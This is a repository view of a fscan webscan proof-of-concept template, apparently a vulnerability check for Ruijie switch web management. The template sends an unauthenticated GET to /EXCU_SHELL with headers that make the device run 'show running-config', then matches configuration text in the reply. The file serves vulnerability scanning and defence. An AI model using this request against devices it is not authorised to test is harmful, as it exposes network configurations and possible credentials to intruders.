Files
fscan/webscan/pocs/ruijie-excu-shell-disclosure.yaml
ZacharyZcR 3ef7a1beee
测试构建 / 代码检查 (push) Has been cancelled
测试构建 / 单元测试和构建 (push) Has been cancelled
测试构建 / 构建验证 (push) Has been cancelled
feat: expand internal network poc coverage
2026-07-16 02:04:36 +08:00

22 lines
529 B
YAML

id: ruijie-excu-shell-disclosure
info:
name: 锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露
author: zan8in
severity: high
verified: true
tags: ruijie,disclosure
created: 2023/09/03
rules:
r0:
request:
method: GET
path: /EXCU_SHELL
headers:
Cmdnum: '1'
Command1: show running-config
Confirm1: n
expression: response.status == 200 && response.body.bcontains(b"Building configuration") && response.body.bcontains(b"Current configuration")
expression: r0()